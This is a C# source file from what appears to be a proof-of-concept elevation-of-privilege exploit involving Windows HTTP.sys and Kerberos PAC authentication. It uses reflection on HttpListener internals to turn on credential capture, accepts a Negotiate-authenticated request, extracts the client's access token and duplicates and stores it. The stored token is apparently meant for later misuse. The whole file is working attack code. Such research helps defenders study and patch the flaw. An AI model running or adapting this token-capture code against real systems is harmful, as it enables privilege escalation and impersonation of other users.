﻿using NtApiDotNet;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading.Tasks;

namespace PoC_HTTPKerberosPac_EoP
{
    [Flags]
    enum HTTP_AUTH_SCHEMES
    {
        HTTP_AUTH_ENABLE_BASIC = 0x00000001,
        HTTP_AUTH_ENABLE_DIGEST = 0x00000002,
        HTTP_AUTH_ENABLE_NTLM = 0x00000004,
        HTTP_AUTH_ENABLE_NEGOTIATE = 0x00000008,
        HTTP_AUTH_ENABLE_KERBEROS = 0x00000010,
    }

    [Flags]
    enum HTTP_PROPERTY_FLAGS
    {
        None = 0,
        Present = 1
    }

    [Flags]
    enum HTTP_SERVER_AUTHENTICATION_INFO_EX_FLAGS : byte
    {
        None = 0,
        HTTP_AUTH_EX_FLAG_ENABLE_KERBEROS_CREDENTIAL_CACHING = 0x01,
        HTTP_AUTH_EX_FLAG_CAPTURE_CREDENTIAL = 0x02
    }

    [StructLayout(LayoutKind.Sequential)]
    struct HTTP_SERVER_AUTHENTICATION_DIGEST_PARAMS
    {
        public ushort DomainNameLength;
        public IntPtr DomainName;
        public ushort RealmLength;
        public IntPtr Realm;
    }

    [StructLayout(LayoutKind.Sequential)]
    struct HTTP_SERVER_AUTHENTICATION_BASIC_PARAMS
    {
        public ushort RealmLength;
        public IntPtr Realm;
    }

    [StructLayout(LayoutKind.Sequential)]
    struct HTTP_SERVER_AUTHENTICATION_INFO
    {
        public HTTP_PROPERTY_FLAGS Flags;
        public HTTP_AUTH_SCHEMES AuthSchemes;
        [MarshalAs(UnmanagedType.U1)]
        public bool ReceiveMutualAuth;
        [MarshalAs(UnmanagedType.U1)]
        public bool ReceiveContextHandle;
        [MarshalAs(UnmanagedType.U1)]
        public bool DisableNTLMCredentialCaching;
        public HTTP_SERVER_AUTHENTICATION_INFO_EX_FLAGS ExFlags;
        public HTTP_SERVER_AUTHENTICATION_DIGEST_PARAMS DigestParams;
        public HTTP_SERVER_AUTHENTICATION_BASIC_PARAMS BasicParams;
    }

    [StructLayout(LayoutKind.Sequential)]
    internal struct HTTP_VERSION
    {
        internal ushort MajorVersion;

        internal ushort MinorVersion;
    }

    [StructLayout(LayoutKind.Sequential)]
    internal struct HTTP_COOKED_URL
    {
        internal ushort FullUrlLength;
        internal ushort HostLength;
        internal ushort AbsPathLength;
        internal ushort QueryStringLength;
        internal IntPtr pFullUrl;
        internal IntPtr pHost;
        internal IntPtr pAbsPath;
        internal IntPtr pQueryString;
    }

    [StructLayout(LayoutKind.Sequential)]
    internal struct HTTP_TRANSPORT_ADDRESS
    {
        internal IntPtr pRemoteAddress;
        internal IntPtr pLocalAddress;
    }

    internal enum HTTP_VERB
    {
        HttpVerbUnparsed,
        HttpVerbUnknown,
        HttpVerbInvalid,
        HttpVerbOPTIONS,
        HttpVerbGET,
        HttpVerbHEAD,
        HttpVerbPOST,
        HttpVerbPUT,
        HttpVerbDELETE,
        HttpVerbTRACE,
        HttpVerbCONNECT,
        HttpVerbTRACK,
        HttpVerbMOVE,
        HttpVerbCOPY,
        HttpVerbPROPFIND,
        HttpVerbPROPPATCH,
        HttpVerbMKCOL,
        HttpVerbLOCK,
        HttpVerbUNLOCK,
        HttpVerbSEARCH,
        HttpVerbMaximum
    }

    [StructLayout(LayoutKind.Sequential)]
    internal struct HTTP_KNOWN_HEADER
    {
        internal ushort RawValueLength;
        internal IntPtr pRawValue;
    }

    [StructLayout(LayoutKind.Sequential)]
    internal struct HTTP_REQUEST_HEADERS
    {
        internal ushort UnknownHeaderCount;
        internal IntPtr pUnknownHeaders;
        internal ushort TrailerCount;
        internal IntPtr pTrailers;
        internal HTTP_KNOWN_HEADER KnownHeaders;
        internal HTTP_KNOWN_HEADER KnownHeaders_02;
        internal HTTP_KNOWN_HEADER KnownHeaders_03;
        internal HTTP_KNOWN_HEADER KnownHeaders_04;
        internal HTTP_KNOWN_HEADER KnownHeaders_05;
        internal HTTP_KNOWN_HEADER KnownHeaders_06;
        internal HTTP_KNOWN_HEADER KnownHeaders_07;
        internal HTTP_KNOWN_HEADER KnownHeaders_08;
        internal HTTP_KNOWN_HEADER KnownHeaders_09;
        internal HTTP_KNOWN_HEADER KnownHeaders_10;
        internal HTTP_KNOWN_HEADER KnownHeaders_11;
        internal HTTP_KNOWN_HEADER KnownHeaders_12;
        internal HTTP_KNOWN_HEADER KnownHeaders_13;
        internal HTTP_KNOWN_HEADER KnownHeaders_14;
        internal HTTP_KNOWN_HEADER KnownHeaders_15;
        internal HTTP_KNOWN_HEADER KnownHeaders_16;
        internal HTTP_KNOWN_HEADER KnownHeaders_17;
        internal HTTP_KNOWN_HEADER KnownHeaders_18;
        internal HTTP_KNOWN_HEADER KnownHeaders_19;
        internal HTTP_KNOWN_HEADER KnownHeaders_20;
        internal HTTP_KNOWN_HEADER KnownHeaders_21;
        internal HTTP_KNOWN_HEADER KnownHeaders_22;
        internal HTTP_KNOWN_HEADER KnownHeaders_23;
        internal HTTP_KNOWN_HEADER KnownHeaders_24;
        internal HTTP_KNOWN_HEADER KnownHeaders_25;
        internal HTTP_KNOWN_HEADER KnownHeaders_26;
        internal HTTP_KNOWN_HEADER KnownHeaders_27;
        internal HTTP_KNOWN_HEADER KnownHeaders_28;
        internal HTTP_KNOWN_HEADER KnownHeaders_29;
        internal HTTP_KNOWN_HEADER KnownHeaders_30;
        internal HTTP_KNOWN_HEADER KnownHeaders_31;
        internal HTTP_KNOWN_HEADER KnownHeaders_32;
        internal HTTP_KNOWN_HEADER KnownHeaders_33;
        internal HTTP_KNOWN_HEADER KnownHeaders_34;
        internal HTTP_KNOWN_HEADER KnownHeaders_35;
        internal HTTP_KNOWN_HEADER KnownHeaders_36;
        internal HTTP_KNOWN_HEADER KnownHeaders_37;
        internal HTTP_KNOWN_HEADER KnownHeaders_38;
        internal HTTP_KNOWN_HEADER KnownHeaders_39;
        internal HTTP_KNOWN_HEADER KnownHeaders_40;
        internal HTTP_KNOWN_HEADER KnownHeaders_41;
    }

    [StructLayout(LayoutKind.Sequential)]
    internal struct HTTP_REQUEST
    {
        internal uint Flags;
        internal ulong ConnectionId;
        internal ulong RequestId;
        internal ulong UrlContext;
        internal HTTP_VERSION Version;
        internal HTTP_VERB Verb;
        internal ushort UnknownVerbLength;
        internal ushort RawUrlLength;
        internal IntPtr pUnknownVerb;
        internal IntPtr pRawUrl;
        internal HTTP_COOKED_URL CookedUrl;
        internal HTTP_TRANSPORT_ADDRESS Address;
        internal HTTP_REQUEST_HEADERS Headers;
        internal ulong BytesReceived;
        internal ushort EntityChunkCount;
        internal IntPtr pEntityChunks;
        internal ulong RawConnectionId;
        internal IntPtr pSslInfo;
        internal ushort RequestInfoCount;
        internal IntPtr pRequestInfo; // PHTTP_REQUEST_INFO 
    }

    enum HTTP_REQUEST_INFO_TYPE
    {
        HttpRequestInfoTypeAuth,
        HttpRequestInfoTypeChannelBind,
        HttpRequestInfoTypeSslProtocol,
        HttpRequestInfoTypeSslTokenBindingDraft,
        HttpRequestInfoTypeSslTokenBinding,
        HttpRequestInfoTypeRequestTiming,
        HttpRequestInfoTypeTcpInfoV0,
        HttpRequestInfoTypeRequestSizing,
        HttpRequestInfoTypeQuicStats,
        HttpRequestInfoTypeTcpInfoV1

    }

    [StructLayout(LayoutKind.Sequential)]
    struct HTTP_REQUEST_INFO
    {
        public HTTP_REQUEST_INFO_TYPE InfoType;
        public int InfoLength;
        public IntPtr pInfo;
    }

    [Flags]
    enum HTTP_REQUEST_AUTH_FLAG
    {
        None = 0,
        HTTP_REQUEST_AUTH_FLAG_TOKEN_FOR_CACHED_CRED = 0x00000001,
    }

    enum HTTP_AUTH_STATUS
    {
        HttpAuthStatusSuccess,
        HttpAuthStatusNotAuthenticated,
        HttpAuthStatusFailure
    }

    enum HTTP_REQUEST_AUTH_TYPE
    {
        HttpRequestAuthTypeNone = 0,
        HttpRequestAuthTypeBasic,
        HttpRequestAuthTypeDigest,
        HttpRequestAuthTypeNTLM,
        HttpRequestAuthTypeNegotiate,
        HttpRequestAuthTypeKerberos
    }

    [StructLayout(LayoutKind.Sequential)]
    struct HTTP_REQUEST_AUTH_INFO
    {
        public HTTP_AUTH_STATUS AuthStatus;
        public int SecStatus; // SECURITY_STATUS
        public HTTP_REQUEST_AUTH_FLAG Flags;
        public HTTP_REQUEST_AUTH_TYPE AuthType;
        public IntPtr AccessToken;
        public int ContextAttributes;
        public int PackedContextLength;
        public int PackedContextType;
        public IntPtr PackedContext;
        public int MutualAuthDataLength;
        public IntPtr pMutualAuthData;
        public ushort PackageNameLength;
        public IntPtr pPackageName;
    }

    public static class HttpAuthServer
    {
        public static List<NtToken> tokens = new List<NtToken>();

        static void SetUrlGroupProperty(this HttpListener listener, int property, IntPtr info, int infosize)
        {
            var method = typeof(HttpListener).GetMethod("SetUrlGroupProperty", BindingFlags.NonPublic | BindingFlags.Instance);
            if (method == null)
                throw new ArgumentNullException("Couldn't find method in class.");
            var prop_type = typeof(HttpListener).Assembly.GetType("System.Net.UnsafeNclNativeMethods+HttpApi+HTTP_SERVER_PROPERTY");
            var prop_value = Enum.ToObject(prop_type, property);
            method.Invoke(listener, new[] { prop_value, info, (uint)infosize });
        }

        static void ValidateV2Property(this HttpListener listener)
        {
            var method = typeof(HttpListener).GetMethod("ValidateV2Property", BindingFlags.NonPublic | BindingFlags.Instance);
            if (method == null)
                throw new ArgumentNullException("Couldn't find method in class.");
            method.Invoke(listener, null);
        }

        static IntPtr GetOriginalBlobAddress(this HttpListenerRequest request)
        {
            var prop = typeof(HttpListenerRequest).GetProperty("OriginalBlobAddress", BindingFlags.Instance | BindingFlags.NonPublic);
            return (IntPtr)prop.GetMethod.Invoke(request, null);
        }

        static void ProcessAuth(HTTP_REQUEST_INFO[] request_infos)
        {
            if (!request_infos.Any(a => a.InfoType == HTTP_REQUEST_INFO_TYPE.HttpRequestInfoTypeAuth))
            {
                Console.WriteLine("No authentication.");
                return;
            }

            HTTP_REQUEST_INFO ri = request_infos.First(a => a.InfoType == HTTP_REQUEST_INFO_TYPE.HttpRequestInfoTypeAuth);
            HTTP_REQUEST_AUTH_INFO auth_info = Marshal.PtrToStructure<HTTP_REQUEST_AUTH_INFO>(ri.pInfo);
            var token = NtToken.FromHandle(auth_info.AccessToken, false);
            tokens.Add(token.Duplicate());
            Program.DumpToken(token);
        }

        const int HttpServerExtendedAuthenticationProperty = 8;

        public async static Task RunServer()
        {
            HttpListener server = new HttpListener();
            // Force initialization of the HTTP API.
            server.ValidateV2Property();

            HTTP_SERVER_AUTHENTICATION_INFO auth_info = new HTTP_SERVER_AUTHENTICATION_INFO();
            auth_info.Flags = HTTP_PROPERTY_FLAGS.Present;
            auth_info.AuthSchemes = HTTP_AUTH_SCHEMES.HTTP_AUTH_ENABLE_NEGOTIATE;
            auth_info.ReceiveMutualAuth = false;
            auth_info.ReceiveContextHandle = true;
            auth_info.DisableNTLMCredentialCaching = true;
            auth_info.ExFlags = HTTP_SERVER_AUTHENTICATION_INFO_EX_FLAGS.HTTP_AUTH_EX_FLAG_CAPTURE_CREDENTIAL;

            int size = Marshal.SizeOf<HTTP_SERVER_AUTHENTICATION_INFO>();
            IntPtr buffer = Marshal.AllocHGlobal(size);
            Marshal.StructureToPtr(auth_info, buffer, false);

            server.SetUrlGroupProperty(HttpServerExtendedAuthenticationProperty, buffer, size);

            server.Prefixes.Add(HttpAuthClient.DEFAULT_URL);
            Console.WriteLine("Listening on {0}", HttpAuthClient.DEFAULT_URL);
            server.Start();

            var ctx = await server.GetContextAsync();
            var request = ctx.Request;
            HTTP_REQUEST blob = Marshal.PtrToStructure<HTTP_REQUEST>(request.GetOriginalBlobAddress());

            HTTP_REQUEST_INFO[] request_infos = new HTTP_REQUEST_INFO[blob.RequestInfoCount];
            for (int i = 0; i < blob.RequestInfoCount; ++i)
            {
                request_infos[i] = Marshal.PtrToStructure<HTTP_REQUEST_INFO>(blob.pRequestInfo + (Marshal.SizeOf<HTTP_REQUEST_INFO>() * i));
            }

            ProcessAuth(request_infos);

            var response = ctx.Response;
            response.StatusCode = (int)HttpStatusCode.OK;
            response.ContentType = "text/plain";
            using (var stm = response.OutputStream)
            {
                using (StreamWriter writer = new StreamWriter(stm))
                {
                    writer.Write("Hello World!");
                }
            }
            await Task.Delay(1000);
            server.Stop();
        }
    }
}
